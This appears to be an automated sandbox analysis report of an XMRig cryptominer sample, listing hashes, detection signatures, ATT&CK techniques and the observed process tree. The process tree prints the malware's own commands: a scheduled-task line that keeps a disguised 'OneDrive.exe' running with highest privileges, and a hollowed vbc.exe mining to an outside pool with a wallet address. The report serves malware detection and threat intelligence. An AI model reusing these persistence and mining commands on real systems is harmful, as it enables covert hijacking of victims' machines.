xmrig | 0bd27d2500a2517a830fe451e0430676d0cda03ff4ca4f1e5de1b772254c47b6

Analysis

max time kernel
128s
max time network
138s
platform
windows10-1703_x64
resource
win10-20231023-en
resource tags

arch:x64arch:x86image:win10-20231023-enlocale:en-usos:windows10-1703-x64system
submitted
11/12/2023, 07:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0bd27d2500a2517a830fe451e0430676d0cda03ff4ca4f1e5de1b772254c47b6.exe
Size

2.3MB
MD5

d493952b6d53bb0bef7763a32e0201ba
SHA1

a45bb206c9bd2a28644ba7070fae3fe48133f486
SHA256

0bd27d2500a2517a830fe451e0430676d0cda03ff4ca4f1e5de1b772254c47b6
SHA512

248137d9d91f5d1aa941b0269ed165feb34aa7a152cdd7034133b39a16f71649140ddd4db887be2b13f1480aa82a287e11eafc62784b2fcd2f883e4e987aa70e
SSDEEP

49152:GPvkK66wOpKQ113en1aFV5tKz3vhPYzBfynpSvb:X9DB61OnUFVzK6Bqnsb

Score

10^/10

xmrig miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 3 IoCs

miner

resource	yara_rule
behavioral1/memory/776-79-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/776-80-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig
behavioral1/memory/776-124-0x0000000140000000-0x00000001407DC000-memory.dmp	xmrig

Executes dropped EXE 1 IoCs

pid	Process
3572	OneDrive.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/776-71-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/776-73-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/776-75-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/776-79-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/776-80-0x0000000140000000-0x00000001407DC000-memory.dmp	upx
behavioral1/memory/776-124-0x0000000140000000-0x00000001407DC000-memory.dmp	upx

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3572 set thread context of 776	3572	OneDrive.exe	78

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3340	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1652	timeout.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

pid	Process
2100	0bd27d2500a2517a830fe451e0430676d0cda03ff4ca4f1e5de1b772254c47b6.exe
2100	0bd27d2500a2517a830fe451e0430676d0cda03ff4ca4f1e5de1b772254c47b6.exe
3572	OneDrive.exe
3572	OneDrive.exe
3572	OneDrive.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
616	Process not Found

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2100	0bd27d2500a2517a830fe451e0430676d0cda03ff4ca4f1e5de1b772254c47b6.exe
Token: SeDebugPrivilege	3572	OneDrive.exe
Token: SeLockMemoryPrivilege	776	vbc.exe
Token: SeLockMemoryPrivilege	776	vbc.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
776	vbc.exe

Suspicious use of WriteProcessMemory 17 IoCs

description	pid	Process	procid_target
PID 2100 wrote to memory of 2488	2100	0bd27d2500a2517a830fe451e0430676d0cda03ff4ca4f1e5de1b772254c47b6.exe	71
PID 2100 wrote to memory of 2488	2100	0bd27d2500a2517a830fe451e0430676d0cda03ff4ca4f1e5de1b772254c47b6.exe	71
PID 2488 wrote to memory of 1652	2488	cmd.exe	72
PID 2488 wrote to memory of 1652	2488	cmd.exe	72
PID 2488 wrote to memory of 3572	2488	cmd.exe	73
PID 2488 wrote to memory of 3572	2488	cmd.exe	73
PID 3572 wrote to memory of 4912	3572	OneDrive.exe	74
PID 3572 wrote to memory of 4912	3572	OneDrive.exe	74
PID 4912 wrote to memory of 3340	4912	cmd.exe	76
PID 4912 wrote to memory of 3340	4912	cmd.exe	76
PID 3572 wrote to memory of 776	3572	OneDrive.exe	78
PID 3572 wrote to memory of 776	3572	OneDrive.exe	78
PID 3572 wrote to memory of 776	3572	OneDrive.exe	78
PID 3572 wrote to memory of 776	3572	OneDrive.exe	78
PID 3572 wrote to memory of 776	3572	OneDrive.exe	78
PID 3572 wrote to memory of 776	3572	OneDrive.exe	78
PID 3572 wrote to memory of 776	3572	OneDrive.exe	78

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\0bd27d2500a2517a830fe451e0430676d0cda03ff4ca4f1e5de1b772254c47b6.exe
"C:\Users\Admin\AppData\Local\Temp\0bd27d2500a2517a830fe451e0430676d0cda03ff4ca4f1e5de1b772254c47b6.exe"
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2100
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF3E5.tmp.bat""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2488
- - C:\Windows\system32\timeout.exe
    timeout 3
    3⤵
    - Delays execution with timeout.exe
    PID:1652
- - C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe
    "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3572
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4912
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ABSOLUTE" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe"
        5⤵
        Creates scheduled task(s)
        
        PID:3340
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      PID:776

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scripting

T1064

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Scripting

T1064

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe

Filesize
2.3MB

MD5
d493952b6d53bb0bef7763a32e0201ba

SHA1
a45bb206c9bd2a28644ba7070fae3fe48133f486

SHA256
0bd27d2500a2517a830fe451e0430676d0cda03ff4ca4f1e5de1b772254c47b6

SHA512
248137d9d91f5d1aa941b0269ed165feb34aa7a152cdd7034133b39a16f71649140ddd4db887be2b13f1480aa82a287e11eafc62784b2fcd2f883e4e987aa70e

Download Submit
C:\ProgramData\SystemPropertiesDataExecutionPrevention\OneDrive.exe

Filesize
1.1MB

MD5
81cd3c6d3073873799e8bfe6aaf98ee9

SHA1
37c1290af91cc373abd71fd601b6c7fcea8fd1e8

SHA256
3cc741a7f7bc78594119f1227cea02101f6eb80f2630f9161a90e043e6cf5f3b

SHA512
eb53b7eebbdd013a39f4bbeb38f30720692e1e894a2f3ce041db71a3722f33c5b920d263b30c0b55c0e0ff764541592a10e2e8de328bb31f5ac9b0f694f6eda3

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpF3E5.tmp.bat

Filesize
176B

MD5
d1da12a8e9f688a513af5d399ccd1672

SHA1
c5dabc5ce5080e0e340c8af6b16357ba7e172138

SHA256
9a803dc4fcb524281c1011f19d945e5c420a97ffe59f0b8cf390ea7ffba4a791

SHA512
b3d84ef15187cb94662763be8f335b4bc2a9c6012b06423a6ed28a7adfe9ec2dee53512adcfedd659830d80c3e9ef24c734aca40a933a55d297dd2088c887c25

Download Submit
memory/776-80-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/776-73-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/776-79-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/776-75-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/776-83-0x00000219D3550000-0x00000219D3570000-memory.dmp

Filesize
128KB

Download
memory/776-117-0x00000219D35A0000-0x00000219D35E0000-memory.dmp

Filesize
256KB

Download
memory/776-122-0x00000219D35F0000-0x00000219D3610000-memory.dmp

Filesize
128KB

Download
memory/776-123-0x00000219D3610000-0x00000219D3630000-memory.dmp

Filesize
128KB

Download
memory/776-71-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/776-124-0x0000000140000000-0x00000001407DC000-memory.dmp

Filesize
7.9MB

Download
memory/776-125-0x00000219D35F0000-0x00000219D3610000-memory.dmp

Filesize
128KB

Download
memory/776-126-0x00000219D3610000-0x00000219D3630000-memory.dmp

Filesize
128KB

Download
memory/2100-29-0x00007FFBC9D70000-0x00007FFBCA069000-memory.dmp

Filesize
3.0MB

Download
memory/2100-38-0x00007FFBBD7D0000-0x00007FFBBD7DA000-memory.dmp

Filesize
40KB

Download
memory/2100-24-0x00007FFBCBDF0000-0x00007FFBCBFCB000-memory.dmp

Filesize
1.9MB

Download
memory/2100-25-0x00007FFBC8750000-0x00007FFBC8999000-memory.dmp

Filesize
2.3MB

Download
memory/2100-26-0x00007FFBCA5E0000-0x00007FFBCA67D000-memory.dmp

Filesize
628KB

Download
memory/2100-27-0x00007FFBCA180000-0x00007FFBCA2A5000-memory.dmp

Filesize
1.1MB

Download
memory/2100-15-0x00007FF6C9480000-0x00007FF6C96D4000-memory.dmp

Filesize
2.3MB

Download
memory/2100-16-0x00007FFBBEDC0000-0x00007FFBBEEEC000-memory.dmp

Filesize
1.2MB

Download
memory/2100-31-0x00007FFBCA070000-0x00007FFBCA111000-memory.dmp

Filesize
644KB

Download
memory/2100-30-0x00007FFBC8310000-0x00007FFBC837A000-memory.dmp

Filesize
424KB

Download
memory/2100-32-0x00007FFBC9350000-0x00007FFBC93A1000-memory.dmp

Filesize
324KB

Download
memory/2100-33-0x00007FFBC93B0000-0x00007FFBC93D7000-memory.dmp

Filesize
156KB

Download
memory/2100-34-0x00007FFBCA2B0000-0x00007FFBCA3FA000-memory.dmp

Filesize
1.3MB

Download
memory/2100-36-0x00007FFBC2F00000-0x00007FFBC2F63000-memory.dmp

Filesize
396KB

Download
memory/2100-37-0x00007FFBBF7C0000-0x00007FFBBF85C000-memory.dmp

Filesize
624KB

Download
memory/2100-17-0x00007FFBB02C0000-0x00007FFBB0CAC000-memory.dmp

Filesize
9.9MB

Download
memory/2100-39-0x00007FFBB02C0000-0x00007FFBB0CAC000-memory.dmp

Filesize
9.9MB

Download
memory/2100-40-0x00007FFBBF500000-0x00007FFBBF5F7000-memory.dmp

Filesize
988KB

Download
memory/2100-41-0x00007FFBC9BC0000-0x00007FFBC9D03000-memory.dmp

Filesize
1.3MB

Download
memory/2100-43-0x0000000001640000-0x0000000001680000-memory.dmp

Filesize
256KB

Download
memory/2100-42-0x00007FFBBEDC0000-0x00007FFBBEEEC000-memory.dmp

Filesize
1.2MB

Download
memory/2100-44-0x00007FF6C9480000-0x00007FF6C96D4000-memory.dmp

Filesize
2.3MB

Download
memory/2100-14-0x00007FF6C9480000-0x00007FF6C96D4000-memory.dmp

Filesize
2.3MB

Download
memory/2100-13-0x00007FFBB02C0000-0x00007FFBB0CAC000-memory.dmp

Filesize
9.9MB

Download
memory/2100-11-0x00007FFBC82B0000-0x00007FFBC82C1000-memory.dmp

Filesize
68KB

Download
memory/2100-12-0x00007FFBBF500000-0x00007FFBBF5F7000-memory.dmp

Filesize
988KB

Download
memory/2100-10-0x00007FFBCA2B0000-0x00007FFBCA3FA000-memory.dmp

Filesize
1.3MB

Download
memory/2100-8-0x00007FFBCA5E0000-0x00007FFBCA67D000-memory.dmp

Filesize
628KB

Download
memory/2100-9-0x00007FFBC93B0000-0x00007FFBC93D7000-memory.dmp

Filesize
156KB

Download
memory/2100-7-0x00007FFBBF7C0000-0x00007FFBBF85C000-memory.dmp

Filesize
624KB

Download
memory/2100-0-0x00007FF6C9480000-0x00007FF6C96D4000-memory.dmp

Filesize
2.3MB

Download
memory/2100-3-0x0000000001640000-0x0000000001680000-memory.dmp

Filesize
256KB

Download
memory/3572-55-0x00007FFBBF7C0000-0x00007FFBBF85C000-memory.dmp

Filesize
624KB

Download
memory/3572-63-0x00007FFBBEDC0000-0x00007FFBBEEEC000-memory.dmp

Filesize
1.2MB

Download
memory/3572-64-0x00007FFBB02C0000-0x00007FFBB0CAC000-memory.dmp

Filesize
9.9MB

Download
memory/3572-65-0x00007FFBC8130000-0x00007FFBC8155000-memory.dmp

Filesize
148KB

Download
memory/3572-66-0x00000000030F0000-0x0000000003100000-memory.dmp

Filesize
64KB

Download
memory/3572-67-0x00007FFBC2ED0000-0x00007FFBC2EF5000-memory.dmp

Filesize
148KB

Download
memory/3572-68-0x00007FFBBA440000-0x00007FFBBA50C000-memory.dmp

Filesize
816KB

Download
memory/3572-69-0x00007FFBCA460000-0x00007FFBCA4CC000-memory.dmp

Filesize
432KB

Download
memory/3572-70-0x00007FFBC78B0000-0x00007FFBC78E7000-memory.dmp

Filesize
220KB

Download
memory/3572-76-0x00007FFBCBDF0000-0x00007FFBCBFCB000-memory.dmp

Filesize
1.9MB

Download
memory/3572-62-0x00007FF7C9F70000-0x00007FF7CA1C4000-memory.dmp

Filesize
2.3MB

Download
memory/3572-77-0x00007FFBC8750000-0x00007FFBC8999000-memory.dmp

Filesize
2.3MB

Download
memory/3572-78-0x00007FFBCA5E0000-0x00007FFBCA67D000-memory.dmp

Filesize
628KB

Download
memory/3572-81-0x00007FFBCA180000-0x00007FFBCA2A5000-memory.dmp

Filesize
1.1MB

Download
memory/3572-82-0x00007FFBC9D70000-0x00007FFBCA069000-memory.dmp

Filesize
3.0MB

Download
memory/3572-61-0x00007FFBB02C0000-0x00007FFBB0CAC000-memory.dmp

Filesize
9.9MB

Download
memory/3572-60-0x00007FFBBF500000-0x00007FFBBF5F7000-memory.dmp

Filesize
988KB

Download
memory/3572-58-0x00007FFBCA2B0000-0x00007FFBCA3FA000-memory.dmp

Filesize
1.3MB

Download
memory/3572-89-0x00007FFBCA2B0000-0x00007FFBCA3FA000-memory.dmp

Filesize
1.3MB

Download
memory/3572-88-0x00007FFBC8650000-0x00007FFBC86EA000-memory.dmp

Filesize
616KB

Download
memory/3572-87-0x00007FFBC93B0000-0x00007FFBC93D7000-memory.dmp

Filesize
156KB

Download
memory/3572-86-0x00007FFBC9350000-0x00007FFBC93A1000-memory.dmp

Filesize
324KB

Download
memory/3572-85-0x00007FFBCA070000-0x00007FFBCA111000-memory.dmp

Filesize
644KB

Download
memory/3572-84-0x00007FFBC8310000-0x00007FFBC837A000-memory.dmp

Filesize
424KB

Download
memory/3572-105-0x00007FF7C9F70000-0x00007FF7CA1C4000-memory.dmp

Filesize
2.3MB

Download
memory/3572-106-0x0000000001100000-0x0000000001140000-memory.dmp

Filesize
256KB

Download
memory/3572-108-0x00007FFBB02C0000-0x00007FFBB0CAC000-memory.dmp

Filesize
9.9MB

Download
memory/3572-59-0x00007FFBC82B0000-0x00007FFBC82C1000-memory.dmp

Filesize
68KB

Download
memory/3572-57-0x00007FFBC93B0000-0x00007FFBC93D7000-memory.dmp

Filesize
156KB

Download
memory/3572-56-0x00007FFBCA5E0000-0x00007FFBCA67D000-memory.dmp

Filesize
628KB

Download
memory/3572-51-0x0000000001100000-0x0000000001140000-memory.dmp

Filesize
256KB

Download
memory/3572-49-0x0000000001100000-0x0000000001140000-memory.dmp

Filesize
256KB

Download
memory/3572-48-0x00007FF7C9F70000-0x00007FF7CA1C4000-memory.dmp

Filesize
2.3MB

Download